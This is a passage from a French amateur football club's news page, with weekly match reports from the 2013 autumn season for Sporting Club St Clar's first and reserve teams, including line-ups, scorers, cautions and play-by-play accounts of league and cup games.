Cette victoire permet au SCSC de prendre seul la tête du championnat mais attention à ne pas trop s’emballer et à rester concentré durant toute la durée du match. Cela commence dès Samedi prochain avec la réception de Miradoux qui, après un début de saison difficile, semble se reprendre (match nul contre Pavie II).
Résultat du week-end (02/11/13):
Déjà éliminés…
Pour leur rentrée en lice dans cette Coupe du Gers, les joueurs du Sporting se déplaçaient sur le terrain du SCPAS II évoluant une division en dessous des jaunes et rouges. Un tirage qui va s’avérer compliqué.
1/16 ème de Finale de la COUPE DU GERS : SCPAS II – ST CLAR : 3-2
Equipe : 1. Baptiste. Péotta, 2. C. Suzes, 3. PM. Sabarros, 4. F. Auricane, 5. Benjamin. Péotta, 6. A. Virelaude, 7. L. Delavat, 8. Y. Abdou, 9. B. Poaragnimou, 10. N. Cantaloup (Cap), 11. C. Metge. Rempl : 12. S. Jeangrand, 13. C. Malateste, 14. T. Hrodej. Coach: J.Blancard Buts : C.Metge (30ème), N.Cantaloup (70ème) Avertissement: A.Virelaude (Fautes à répétition) Le match commence sous un déluge, les joueurs du Sporting sont les premiers à se mettre en action, « Yass » récupère un ballon au 20m et se fait crocheter dans la surface mais pas pour l’arbitre qui siffle coup franc sur la ligne des 18m. Coup franc qui ne donnera rien. Les locaux jouent bien au ballon et sur un décalage côté droit, « Bats » gagne son duel avec l’attaquant. A la demi -heure de jeu sur un joli mouvement collectif sur le côté gauche entamé par « Nico et Clem », Yass récupère le ballon dans la surface, dribble le gardien et sert « Clem » sur un plateau qui a bien suivi pour l’ouverture du score, 0-1. Dans la foulée, les joueurs de St Christie-Preignan égalisent, l’attaquant part dans le dos des défenseurs centraux et s’en va battre « Bats » sortit à sa rencontre, 1-1. Le match devient brouillon, la pluie n’arrangeant pas les choses. Mi-temps : 1-1. Après la pause des citrons, sur un coup franc excentré, les joueurs locaux vont reprendre l’avantage, « François » en duel aérien voit sa tête trompée « Bats », 2-1. St Clar part à l’attaque et sur une transversale de « Yass » pour « Nico », le défenseur en voulant couper la trajectoire touche le ballon des mains dans la surface, pénalty, que « Nico » transforme, 2-2. St Christie-Preignan reprend possession du ballon, un cafouillage s’ensuit dans la surface de « Bats », le ballon a du mal à être dégagé et sur un tir contré des locaux, le cuir va se loger dans les filets, 3-2. Les joueurs du Sporting poussent, « Ludo » est lancé en profondeur mais l’arbitre assistant local lève son drapeau pour un hors-jeu inexistant. On s’approche de la fin du match, « Nico » est lancé dans la surface, le gardien sortit à sa rencontre lui embarque les deux jambes et le bruit du contact n’est pas trompeur sauf pour Mr l’arbitre qui fait signe qu’il n’y a rien. Fin du match, défaite 3-2 et élimination de la Coupe du Gers. Week-end prochain retour au championnat à Manciet, où les locaux en besoin de points attendront les St Clarais le couteau entre les dents…le décor est planté.
Résultat du week-end (26/10/13):
L’équipe I se qualifie pour les 32ème de la Coupe du Midi !
Pour ce tour de Coupe du Midi face à Vallée de l’Arrats, coach « Julien » avait décidé de laisser au repos quelques cadres de l’équipe très sollicités depuis le début de la saison et de faire confiance à la jeunesse du club (Micka, Henri, Clément,..) encadrée par quelques joueurs « expérimentés » (Titi, Steph ou Titcho…).
5ème Tour de la COUPE DU MIDI : ST CLAR – VALLEE DE L’ARRATS : 2-0 AP
Equipe : 1. Baptiste Peotta, 2. P. Pinto, 3. A. Thomeret, 4. F. Larribeau, 5. Benjamin Peotta (Cap), 6. H. Mancey, 7. C. Metge, 8. B. Sabarros, 9. L. Delavat, 10. S. Jeangrand, 11. M. Xompero. Rempl: 12, T. Larribeau, 13. M. Cros, 14. S. Portillo, Coach : J. Blancard. Buts : S. Jeangrand (95ème), C. Metge (110ème) Avertissements : S. Jeangrand (Geste d’humeur) , F. Larribeau (Contestation) Ce match entre les 2 leaders de l’Excellence ne restera pas dans les mémoires et s’est le plus souvent résumé à une bataille au milieu du terrain, aucune équipe n’arrivant à poser ni imposer son jeu. « Clem » et Ludo tentent bien de faire parler leur vitesse mais sans vraiment mettre en danger la défense adverse alors que les défenseurs jaune et rouge contiennent sans trop de peine les attaques de Vallée de l’Arrats. La pause est atteinte sur le score de 0-0. A la mi-temps, « Coach Julien » décide de faire parler l’expérience avec les entrées en jeu de « Titi » et « Steph » ainsi que celle de « Mederic ». La seconde période démarre sur le même schéma que la première et les occasions sont toujours aussi rares. A noter un bel arrêt de « Bats » sur un centre-tir visiteur alors que « Jeantho » voit un de ses coup-francs bien capté par le gardien adverse. Et ce que craignaient les 2 équipes arrive, à savoir les prolongations. Dans la première, à la 95ème, « Titcho » dégage un ballon de la tête en direction de Simon qui ouvre le score d’une magnifique frappe enroulée. Dès lors, Saint-Clar se contente de gérer cet avantage et de procéder par contres. Sur l’un d’eux, encore initié par « Titcho », « Clem » prend la défense de vitesse et trompe le gardien d’un astucieux tir croisé et assure la qualification pour les 32èmes de finale de cette Coupe du Midi. Merci aux « anciens » qui ont participé à ce match et qui ont montré qu’ils n’ont rien perdu de leurs qualités footballistiques. Prochain match, samedi pour le compte de la Coupe du Gers contre SCPAS II sur leur terrain.
Résultat du week-end (26/10/13):
Bon départ en Coupe des Réserves pour le Sporting !
Ce week-end retour à la coupe pour les joueurs de l’équipe II. Déplacement à St Sauvy II en Coupe des Réserves, équipe évoluant deux divisions en dessous mais qui avaient éliminé les réservistes l’an dernier à pareille époque, donc sérieux et vigilance était au programme.
1/16 ème de Finale de la COUPE DES RESERVES : ST SAUVY II – ST CLAR : 1-6
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. A. Davasse, 5. JF. Jouet, 6. V. Taupiac (Cap), 7. C. Malateste, 8. T. Hrodej, 9. S. Buttigieg, 10. J. Lasserre, 11. C. Suzes. Rempl: 12. V. Lucas, 13. A. Serra, 14. C. Boukkera, Coach: C.Boukkera Buts: C.Suzes (10ème) (15ème), J.Lasserre (55ème), V.Lucas (65ème), S.Buttigieg (75ème), C.Malateste (90ème) Avertissement: Dès le début du match, les jaunes et rouges prennent possession du ballon grâce à « Taupi » et « Kinou » en organisateurs au milieu du terrain. A la 10ème minute sur un coup franc renvoyé par le mur adverse au 25m, « Kinou » récupère le ballon et ouvre pour « Cissou » partit sur son côté droit à la limite du hors-jeu et vient tromper le gardien de près, 0-1. Dans la continuité, « Pampouille » d’une jolie passe décale « Cissou » qui va gagner son face à face avec le gardien, 0-2. Les joueurs locaux se réveillent et commencent à pousser leurs actions sans vraiment trop inquiéter « Lolo », ce qui a le don de faire douter les St Clarais. Juste avant la mi-temps, l’attaquant local, part sur son côté, rentre dans la surface tout en technique et centre au second poteau mais « Jeff » en voulant s’interposer détourne le ballon dans les buts, 1-2. Mi-temps. Au retour des vestiaires, les réservistes reprennent leur marche en avant et sur un joli service de « Matt », « Pampouille » d’une tête lobée vient marquer le but du break, 1-3. Dix minutes plus tard « Bono » signe le but de la soirée, bien servi par « Matt » sur le côté gauche, il rentre intérieur et enroule sa frappe qui finit dans la lucarne du gardien, 1-4. « Stephen » en renard des surfaces aggrave le score, 1-5. Et « Kinou » juste avant le coup de sifflet final clôture la marque sur pénalty, 1-6. Qualification pour le prochain tour. Week-end prochain repos pour l’équipe II et dans 15 jours retour au championnat à St Sauvy mais cette fois-ci contre l’équipe I, ce qui devrait être une autre paire de manche…
Résultats du week-end (19/10/13):
Bon week-end pour le Sporting !
Après un week-end dernier destiné aux Coupes, les deux équipes du Sporting recevaient pour cette quatrième journée de championnat. Les réservistes ont fait match nul contre Castera-Verduzan, un cador de la poule. Tandis que les joueurs de l’équipe fanion l’ont emporté face à Sud Astarac, un prétendant à la montée.
CHAMPIONNAT DE PROMOTION EXCELLENCE: ST CLAR II – CASTERA-VERDUZAN : 1-1
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. A. Davasse, 5. PM. Sabarros, 6. V. Taupiac (Cap), 7. JF. Jouet, 8. T. Hrodej, 9. S. Buttigieg, 10. A. Mouchet, 11. B. Benard. Rempl: 12. V. Lucas, 13. C. Suzes, 14. C. Malateste, Coach: J. Blancard et T.Larribeau But: C.Suzes (85ème) Avertissement: PM Sabarros (Carton Rouge) Le début du match commence timidement pour les jaunes et rouges, ils n’arrivent pas à poser leur jeu. Les visiteurs gagnent les duels physiques et au quart d’heure de jeu sur une percée côté droit de la défense St Claraise, le milieu de terrain rentre dans la surface et passe en retrait pour son attaquant étrangement seul au point de penalty qui ne se fait pas prier pour ouvrir le score, 0-1. Castéra-Verduzan continue sur leur lancée, seul « Jeff » et « Brian » sorte la tête de l’eau. Les visiteurs obtiennent des coups francs dangereux mais « Lolo » sort les parades. Sur une rare occasion en première mi-temps, « Brian » est tout près d’égaliser mais le gardien adverse s’interpose. Mi-temps: 0-1. Au retour des vestiaires, les joueurs du Sporting montrent un tout autre visage, plus hargneux et plus conquérant dans les duels mais le jeu reste toujours aussi approximatif. L’arbitre du soir quant à lui est tout aussi approximatif ou peut être ailleurs…sur un geste d’humeur d’un joueur adverse sur « Jeff » à terre, l’arbitre expulse « Bernard » et un joueur de Castéra non coupable du geste, bizarre comme interprétation… La fin de la rencontre approche, « Kinou » par sa technique apporte le danger. St Clar obtient un coup franc excentré, « Bono » s’écroule dans la surface, pénalty que « Cissou » transforme en deux fois avec plein de sang-froid, 1-1. Plus rien ne sera marquer dans la rencontre qui ne restera pas dans les mémoires mais les réservistes restent toujours invaincus à domicile et grappillent des points pour le maintien. Prochain match samedi à St Sauvy II pour un tour de Coupe des Réserves à 20h, en espérant ne pas revivre le même match que l’an dernier à pareille époque.
CHAMPIONNAT D’EXCELLENCE : ST CLAR – SUD ASTARAC : 2-0
Equipe : 1. Baptiste. Peotta, 2. R. Clavel, 3. B. Sabarros, 4. F. Larribeau, 5. Benjamin. Peotta, 6. A. Virelaude, 7. Y. Abdou, 8. L. Delavat, 9. N. Armengol, 10. N. Cantaloup (Cap), 11. A. Thomeret. Rempl: 12. F. Auricane, 13. C. Metge, 14. M. Huntz, Coach: J.Blancard Buts: A.Thomeret (20ème), N.Cantaloup (65ème) Avertissements: B.Sabarros (Tacle dangereux), C.Metge (Tacle dangereux) Pour ce match au sommet, les joueurs du Sporting attaquent la rencontre tambour battant, « Jeantho » sur le premier corner trouve le poteau. Le pressing des jaunes et rouges s’accentue notamment par « Yass » et ses percées plein axe. St Clar obtient un coup franc au 30m, « Jeantho » en maître artificier s’en charge et envoie un pétard dans les buts, 1-0. Les visiteurs sortent de leur camp, et suite à un corner « Bats » gratifie les spectateurs d’une belle parade sur une tête du défenseur qui prenait le chemin des filets. Les St Clarais reprennent leur marche en avant, « Chamako » donne le tournis au défenseur mais « Nico » est approximatif dans le dernier geste. Suite à un corner, « Nico » est déséquilibré dans la surface mais l’arbitre ne bronche pas. « Nico » encore lui juste avant la mi-temps suite à un centre au second poteau marque mais l’arbitre assistant le signale hors-jeu… Mi-temps: 1-0. Au retour des vestiaires, les joueurs du Sporting ne lâchent rien, « Palof » en est l’exemple, il ratisse pas mal de ballons au milieu de terrain et quand les visiteurs arrivent à passer, le bloc défensif St Clarais s’impose. On a dépassé l’heure de jeu, « Nico » part plein axe, use des contres favorables et se retrouve face au gardien et ne se fait pas prier pour marquer le deuxième but du match, 2-0. « Benben » est hyper actif sur son côté. « Clem » fraîchement rentré apporte sa fougue et sa vista. A quelques minutes de la fin du match sur une passe de « Fabien », « Nico » encore lui trouve la barre, « Fabien » suit mais un défenseur détourne son tir sur la ligne. L’arbitre siffle la fin du match, jolie victoire du Sporting sur ses terres face à un prétendant à la montée. Week-end prochain, réception de Vallée de l’Arrats en Coupe du Midi, ce qui permettra à certains cadres de l’équipe fanion de souffler, les matchs de Coupe de France commencent à faire leurs effets sur les organismes.
Résultat du week-end (13/10/13):
La marche était trop haute cette fois !
Pour ce 5ème Tour de Coupe de France, les joueurs du Sporting recevaient Foix qui joue en Promotion Honneur dans l’Ariège. Une équipe évoluant deux divisions au-dessus des St Clarais. Une équipe composée d’un ancien joueur professionnel d’Epinal en National et de divers joueurs ayant fréquenté des centres de formation de renom (TFC, PSG…). Cette fois la marche était trop haute pour les St Clarais, mais ils ont fait honneur au maillot et au clocher durant cette belle épopée.
5ème Tour de la COUPE DE FRANCE : ST CLAR – FOIX : 0-5
Equipe : 1. Baptiste. Péotta, 2. R. Clavel, 3. B. Sabarros, 4. F. Auricane, 5. Benjamin. Péotta, 6. A. Virelaude, 7. F. Moussaron (Cap), 8. Y. Abdou, 9. N. Armengol, 10. L. Delavat, 11. A. Thomeret. Rempl : 12. L. Fabbro, 13. F. Larribeau, 14. B. Benard, 15. N. Cantaloup, 16. P. Pinto. Coach: J.Blancard But : Avertissement : Dès le début du match et devant une belle affluence, les joueurs de Foix prennent possession du ballon, les St Clarais étant attentiste tout en essayant de limiter les espaces. A la 10ème minute, l’attaquant adverse part à la limite du hors-jeu sur son côté et centre au point de pénalty pour son coéquipier qui coupe la trajectoire de la tête, « Bats » ne pouvant rien faire, 0-1. Foix continue son pressing, et use de ballon sur ses ailiers rapide et sur l’un deux, encore à la limite du hors-jeu voire hors-jeu pour certains spectateurs St Clarais bien placés, l’attaquant adverse s’en va défier « Bats » qui ne peut rien faire, 0-2. Le match baisse d’intensité, mais les joueurs du Sporting commence à refaire surface, les coups de pied arrêtés de « Jeantho » s’enchainent mais ni « Mouss » et « Ludo » n’en profitent. « Chamako » use de sa vitesse mais l’arrière garde adverse ne laisse rien passer. L’arbitre siffle la mi-temps, 0-2. Au retour des vestiaires, « Chamako » à l’occasion de réduire le score sur un coup franc indirect dans la surface, mais le gardien adverse en avait décidé autrement. A la 70ème minute sur un coup franc excentré des joueurs du Sporting, le ballon frappe le poteau, Foix récupère le ballon et par en contre pour marquer de fort belle manière le but du break, 0-3. Les St Clarais se ruent à l’attaque pour marquer ce petit but qui serait tant mérité mais ceux sont les joueurs adverses qui marqueront encore deux fois malgré de belles interventions de « Bats ». L’arbitre siffle la fin du match sur ce score de 0-5. Les joueurs du Sporting s’arrêtent donc au 5ème Tour de la Coupe de France cette année, une très belle performance qui a encore montré que les valeurs humaines et l’amour du maillot faisaient foi au sein de ce groupe. Maintenant retour au championnat samedi prochain contre Sud Astarac à St Clar, une équipe difficile à manœuvrer et prétendante à la montée qui viendra pour essayer de faire un coup. Il ne faut pas l’oublier, le championnat est notre pain quotidien…
Résultat du week-end (12/10/13):
Les Réservistes éliminés d’entrée du Challenge du District !
Pour leur entrée dans cette coupe, les joueurs du Sporting se déplaçaient à Ségoufielle, un match piège en vue…
1/8 ème DE FINALE CHALLENGE DU DISTRICT : SEGOUFIELLE II – ST CLAR II : 2-1
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. JF. Jouet, 5. PM. Sabarros, 6. V. Taupiac (Cap), 7. T. Hrodej, 8. V. Lucas, 9. C. Suzes, 10. S. Jeangrand, 11. R. Boukkera. Rempl: 12. S. Buttigieg, 13. M. Xompero, 14. J. Sousa, Coach: C. Boukkera Buts: J.Sousa (80ème) Avertissements: M.Berto (Faute dangereuse), JF.Jouet (Faute dangereuse), S.Jeangrand (Geste d’humeur), R.Boukkera (Attitude anti-sportive et Faute dangereuse) = Carton Rouge Dès le début du match, les joueurs locaux exercent un pressing féroce et sur une erreur défensive, l’arbitre siffle un pénalty que l’attaquant transforme sans trembler, 1-0, 3mn de jeu. Ségoufielle continue sur leur lancée sans aucune réaction des jaunes et rouges, et à la 20ème minute de jeu, sur une balle en profondeur, l’attaquant prend de vitesse la défense St Claraise et vient fusiller « Lolo » de près, 2-0. Petit à petit les joueurs du Sporting rentrent dans leur match et la plus grosse occasion de cette première mi-temps est à mettre au profit de « Bono » qui juste avant la pause ajuste mal son lob…Mi-temps : 2-0. Après la pause des citrons, les réservistes St Clarais essayent de poser le jeu, mais ils vont se heurter à la rudesse des joueurs de Ségoufielle, « Simon » sortit sur blessure peut en témoigner. Ils faut attendre les premiers changements de « Coach Bouki » pour voir un nouvel élan dans cette rencontre, « Micka » apporte des solutions sur son côté et « Robi » lui apporte des complications à l’arbitre, carton rouge suite à deux cartons jaunes. Malgré cela, les jaunes et rouges continuent leur pressing et « José » fraichement rentré et plein d’envie tente un tir tendu des 20m qui fait mouche, 2-1. Les joueurs locaux à bout physiquement s’arcqueboutent devant leur gardien, « Matt » envoie deux frappes des 25m qui donnent des sueurs au gardien adverse. On rentre dans les arrêts de jeu, « Bono » prend de vitesse son vis à vis et s’effondre dans la surface, pénalty, « Matt » s’élance mais le gardien détourne des poings. L’arbitre siffle la fin du match, défaite 2-1 et élimination du Challenge du District. Difficile de faire mieux quand on commence à rentrer dans le match à la 70ème minute…Prochain match, samedi prochain à St Clar contre un cador du championnat, Castéra-Verduzan, en espérant voir un tout autre visage que les deux derniers matchs…
Résultats du week-end (05/10/13):
L’équipe fanion continue sur sa lancée, les réservistes chutent à l’extérieur !
Les deux équipes du Sporting se déplaçaient pour cette troisième journée de championnat. Les réservistes ont chuté lors du derby à Pauilhac sur le score de 2-1. Tandis que les joueurs de l’équipe fanion ont ramené la victoire de leur déplacement à l’Isle Jourdain sur le score de 0-3.
CHAMPIONNAT DE PROMOTION EXCELLENCE : PAUILHAC – ST CLAR II : 2-1
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. A. Davasse, 5. PM. Sabarros, 6. V. Taupiac (Cap), 7. T. Hrodej, 8. V. Lucas, 9. J. Lasserre, 10. A. Mouchet, 11. C. Suzes. Rempl: 12. A. Serra, 13. S. Buttigieg, 14. R. Boukkera, Coach: C. Boukkera But: M.Berto (70ème) Avertissement: A.Serra (Tacle dangereux) Face au voisin Pauilhacais, le match commence tambour battant, les locaux ouvrent la marque sur leur première action, 1-0. Les jaunes et rouges vont courir après le score, se procurant de belles occasions notamment par « Mouchet » mais un défenseur adverse repoussera son tir sur la ligne. « Cissou » sera tout près d’égaliser mais son lob passera juste au-dessus de la transversale. Malgré une domination des joueurs du Sporting et une envie de poser le jeu sur un terrain très difficile, la mi-temps sera atteinte sur ce score de 1-0 pour les locaux. Après une mi-temps mouvementée, ceux sont les joueurs de Pauilhac qui doubleront la mise, suite à un corner, le milieu local tente une demi-volée en coin qui va se loger dans la lucarne de « Lolo », 2-0. « Coach Bouki » procède à des changements qui vont porter leurs fruits, suite à un tir de « Robi » le défenseur adverse détourne le ballon du bras dans la surface, pénalty que « Matt » transforme sans trembler, 2-1. La rencontre va devenir plus décousue et les actions approximative, le terrain n’étant pas propice au jeu, malgré quelques actions de « Cissou » sur son côté, les St Clarais n’arriveront pas à refaire leur retard. Fin du match 2-1. Prochain match samedi prochain à Ségoufielle II pour la coupe du Challenge du District.
“L’équipe II” de cette nouvelle saison
CHAMPIONNAT D’EXCELLENCE : L’ISLE JOURDAIN II – ST CLAR : 0-3
Equipe : 1. Baptiste. Peotta, 2. R. Clavel, 3. B. Sabarros, 4. A. Virelaude, 5. Benjamin. Peotta, 6. F. Larribeau, 7. F. Moussaron (Cap), 8. L. Delavat, 9. N. Armengol, 10. S. Jeangrand, 11. L. Fabbro. Rempl: 12. F. Auricane, 13. A. Jeangrand, 14. A. Thomeret, Coach: J.Blancard Buts: S.Jeangrand (3ème), N.Armengol (30ème), F.Moussaron (70ème) Avertissement: A.Virelaude (Charge irrégulière) Dès le début du match, les joueurs du Sporting prennent possession du ballon et il ne faut pas longtemps pour voir le premier but de la rencontre. A la 3ème mn, « Bats » dégage, « Chamako » dévie pour « Lolo » qui part sur son côté gauche, il rentre intérieur et trouve « Simon » au 20m qui tente sa chance d’un tir lob qui va se loger dans la lucarne du gardien, 0-1. Les rouges et jaunes continuent leur pressing notamment au milieu de terrain par « Mouss et Fabien ». A la demi-heure de jeu, « Lolo » sur son côté, rentre dans la surface, donne à « Simon » qui donne à « Chamako » dans les 6m qui s’en va battre le gardien de près, 0-2. L’Isle Jourdain a du mal à s’approcher de la cage de « Bats » dû à une bonne défense du Sporting. La mi-temps est sifflée sur ce score de 0-2. Après la pause citron, les joueurs locaux montrent un tout autre visage et va s’en suivre 10mn de pressing de leur part, mais leurs tirs lointains n’inquièteront pas « Bats ». Alors qu’on a dépassé l’heure de jeu, « Bats » dégage plein axe, « Raphy » en pleine bourre gagne son duel de la tête, « Chamako » récupère le cuir et le transmet en profondeur à « Mouss » qui vient tromper le gardien en finesse, 0-3. Les joueurs du Sporting continuent de développer leur jeu, sur une superbe passe de « Jeantho » rentré en cour de jeu, « Chamako » libre de tout marquage au deuxième poteau tire mais le gardien détourne la frappe sur le poteau. On s’approche de la fin du match, « Jeantho » tire le corner pour « François » mais sa tête est dégagée sur la ligne par un défenseur. L’Isle Jourdain va se procurer la dernière occasion du match, mais l’attaquant au 6m envoie le ballon dans les nuages. Fin du match. Les joueurs du Sporting continue sur leur lancée après cette belle victoire à l’extérieur. Prochain match dimanche prochain pour le 5ème Tour de la Coupe de France contre Foix (PH) à St Clar à 15h. Venez nombreux encourager les joueurs du Sporting !
1er match pour “Simon” et 1er but
Résultat du week-end (29/09/13):
Ils l’ont fait !
Pour ce 4ème Tour de Coupe de France, les joueurs du Sporting recevaient St Jean du Falga qui joue en Promotion Ligue dans l’Ariège. Une équipe évoluant une division au-dessus des St Clarais et ayant pour objectif la montée en Promotion Honneur. Les joueurs du Sporting ont su être rigoureux, appliqués et patients pour aller chercher la qualification pour le 5ème Tour.
4ème Tour de la COUPE DE FRANCE : ST CLAR – ST JEAN DU FALGA : 1-0 AP
Equipe : 1. Baptiste. Péotta, 2. R. Clavel, 3. A. Thomeret, 4. F. Auricane, 5. Benjamin. Péotta, 6. Y. Abdou, 7. F. Moussaron (Cap), 8. L. Delavat, 9. N. Armengol, 10. B. Poaragnimou, 11. L. Fabbro. Rempl : 12. R. Boukkera, 13. F. Larribeau, 14. A. Virelaude, 15. N. Cantaloup, 16. B. Benard. Coach: J.Blancard But : N.Cantaloup (95ème) Avertissements : N.Armengol (Contestation), A.Thomeret (Tacle dangereux), F.Moussaron (Tacle dangereux), F.Larribeau (Tacle dangereux), L.Delavat (Tacle dangereux) Le match commence sous une pluie battante, les joueurs des deux cotés se jaugent et ne prennent aucun risque. La première occasion est pour les visiteurs, sur un déboulé côté droit, le milieu de terrain centre en retrait pour son attaquant mais sa frappe n’est pas cadrée. Les joueurs du Sporting répliquent, « Chamako » lancé sur le côté gauche se présente devant le gardien mais celui-ci remporte son duel. S’ensuit un match haché où les joueurs des deux camps vont se rendre coup sur coup sur coup de pieds arrêtés mais rien ne sera marqué, Mi-temps : 0-0. Après la pause, les joueurs de St Jean du Falga prennent possession du ballon, mais la défense St Claraise bien dirigée par « Papy » tient bon. A la 75ème mn sur une contre-attaque « Nico » rentré en cours de jeu devance la sortie du gardien, mais sa tête est dégagée sur la ligne par un défenseur. Les joueurs visiteurs obtiennent des coups francs dangereux dans les ultimes minutes, mais le jeu de tête de « François » va s’avérer précieux. L’arbitre siffle la fin du match. 30mn de prolongations auront lieu. Dès le début des prolongations, « Mouss » en bon capitaine sonne la charge, il oblige le gardien à sortir la parade sur sa frappe des 20m en coin. St Clar pousse, « Ludo » récupère un ballon et le passe à « Papy », celui-ci décale « Chamako » qui centre parfaitement pour « Nico » au deuxième poteau libre de tout marquage, et qui d’une tête prend à contre-pied le gardien, 1-0, joie dans les tribunes et sur le terrain. Les joueurs du Sporting continuent leur pressing, « Chamako » part sur le côté droit, rentre intérieur et tente une frappe enroulée qui rase la lucarne du gardien qui était resté sans réaction. L’arbitre siffle la fin des 15 première minutes de la prolongation, changement de côté. Les joueurs Ariégeois entament ces dernières 15mn pied au plancher, mais les St Clarais ne lâchent pas, multipliant les interventions malgré la fatigue. L’arbitre siffle la fin du match, les joueurs du Sporting laissent éclater leur joie et partent remercier les nombreux supporters venus les encourager. St Clar sera donc le petit poucet de cette compétition ainsi que le dernier représentant du Gers lors du 5ème Tour de Coupe de France qui aura lieu le week-end du 12 et 13 Octobre. Mais avant cela, retour au championnat ce week-end, déplacement samedi à l’Isle Jourdain II chez un promu qui aura à cœur d’accrocher St Clar à son tableau de chasse, donc vigilance…
La joie des joueurs St Clarais dans le vestiaire à la fin du match
Résultats du week-end (21/09/13):
Le Sporting confirme à domicile
Les deux équipes du Sporting recevaient à nouveau pour cette deuxième journée de championnat. Les réservistes ont concrétisé les points obtenus lors de la première journée en disposant cette fois-ci de Vic Fezensac II sur le score de 2-1. Et les joueurs de l’équipe fanion ont fait de même en disposant de fort belle manière du Houga sur le score de 4-0.
CHAMPIONNAT DE PROMOTION EXCELLENCE : ST CLAR II – VIC FEZENSAC II : 2-1
Equipe : 1. L. Gamot, 2. D. Solagna, 3. M. Berto, 4. A. Davasse, 5. PM. Sabarros, 6. V. Taupiac (Cap), 7. JF. Jouet, 8. T. Hrodej, 9. J. Lasserre, 10. S. Buttigieg, 11. R. Boukkera. Rempl: 12. A. Mouchet, 13. M. Huntz, 14. A. Arroues, Coach: C. Boukkera Buts: R.Boukkera (30ème) (65ème) Avertissements: A.Arroues (Tacle dangereux), R.Boukkera (Contestation) Le début du match commence timidement, les deux équipes se jaugent, et le jeu se concentre au milieu du terrain. Il faut attendre le quart d’heure de jeu pour voir la première action des jaunes et rouges, sur un corner, « Robi » au deuxième poteau claque une tête puissante que le gardien arrête. A la demi-heure de jeu, sur une touche St Claraise, « Jeff » dévie de la tête pour « Taupi » qui lui aussi dévie de la tête pour « Robi » qui lancé reprend de volée et trompe le gardien adverse, 1-0. Les joueurs Vicois ont du mal à s’approcher des buts de « Lolo » à cause d’une défense St Claraise appliquée et bien dirigée par « Bernard ». Mi-temps : 1-0. Après la pause des citrons, l’entrée en jeu de « Mouchet et Michou » va apporter de la tonicité à l’attaque du Sporting et sur un très joli travail de « Michou » côté gauche, « Mouchet » rentre dans la surface et décale « Robi » au 6m qui envoie le ballon au fond des filets, 2-0. Les joueurs adverses se réveillent et se lancent à l’attaque mais « Lolo » gagne joliment son duel face à l’attaquant. Les jaunes et rouges gèrent leur avance. On est dans les arrêts de jeu, quand l’attaquant de Vic est lancé en profondeur, il décoche une frappe des 25m qui vient se loger dans la lucarne de « Lolo », 2-1. Malgré une dernière offensive des Vicois, le score ne bougera plus. Deuxième victoire à domicile en autant de match pour les réservistes qui débutent parfaitement ce début du championnat tout nouveau pour eux. Prochain match le 5 octobre à 20h30 sur les terres de Pauilhac, pour un derby qui s’annonce palpitant.
“Robi” auteur d’un joli doublé
CHAMPIONNAT D’EXCELLENCE : ST CLAR – LE HOUGA : 4-0
Equipe : 1. Baptiste. Peotta, 2. R. Clavel, 3. A. Thomeret, 4. A. Virelaude, 5. Benjamin. Peotta, 6. Y. Abdou, 7. F. Moussaron (Cap), 8. L. Delavat, 9. N. Armengol, 10. N. Cantaloup, 11. L. Fabbro. Rempl: 12. F. Auricane, 13. B. Benard, 14. F. Larribeau, Coach: J.Blancard Buts: N.Cantaloup (15ème), N.Armengol (35ème), A.Thomeret (65ème), L.Fabbro (90ème) Avertissements: F.Moussaron (Anti-jeu), B.Benard (Faute grossière) Dès le début du match, les joueurs du Sporting prennent possession du ballon et il ne faut pas longtemps pour que « Nico » se crée la première occasion du match. Au quart d’heure de jeu, « Jeantho » enchaîne les corners et la troisième tentative est la bonne, il dépose le cuir sur la tête de « Nico » au 6m qui trompe le gardien visiteur, 1-0. « Chamako » affole la défense du Houga par ses courses et ses centres en retrait mais le dernier geste fait défaut. A 10mn de la mi-temps, « Ludo » récupère le ballon, il transmet à « Nico » qui d’une passe lance « Chamako » en profondeur, « Chamako » ne se fait pas prier et d’un joli tir croisé vient tromper le gardien sorti à sa rencontre, 2-0. Les joueurs du Houga vont se créer une belle occasion due à une maladresse défensive de « Bats ». Mais « Bats » se rattrape et détourne le tir en corner. La mi-temps est sifflée sur ce score de 2-0. Au retour des vestiaires, les joueurs St Clarais continuent sur leur lancée et après un très joli travail de « Chamako » sur le côté droit, « Mouss » est tout près d’inscrire le troisième but du match, mais son tir rase le poteau. Après l’heure de jeu, les jaunes et rouges obtiennent un coup franc au 30m, « Jeantho » en maître artificier s’en charge et envoie le ballon en lucarne avec l’aide de la barre, le gardien est resté sans réaction, 3-0. On s’approche de la fin du match, l’attaquant visiteur lancé en profondeur est déséquilibré dans la surface, pénalty, mais le poteau et le plongeon de « Bats » du bon côté vont contrarier la réduction du score du Houga. Juste avant la fin de la rencontre, un joueur adverse est expulsé pour des fautes à répétitions sur « Chamako ». On est dans les arrêts de jeu, quand « Raphy » d’un joli centre trouve « Lolo » au 20m, qui d’une belle reprise de volée vient inscrire le 4ème but de la rencontre, 4-0. L’arbitre siffle la fin du match. Belle victoire des joueurs du Sporting, les spectateurs ont apprécié le spectacle… Prochain match dimanche prochain pour le 4ème Tour de la Coupe de France contre St Jean du Falga (PL) à St Clar à 15h. Venez nombreux encourager les joueurs du Sporting !
« L’équipe fanion du Sporting » auteur d’une belle rencontre
Résultat du week-end (14/09/13):
En route pour le 4ème Tour…
Pour ce 3ème Tour de Coupe de France, les joueurs du Sporting recevaient Lèguevin, une équipe évoluant dans le District Midi-Toulousain. Les jaunes et rouges ont bien su gérer ce match plus compliqué qu’il ne le paraissait.
3ème Tour de la COUPE DE FRANCE : ST CLAR – LEGUEVIN : 1-0
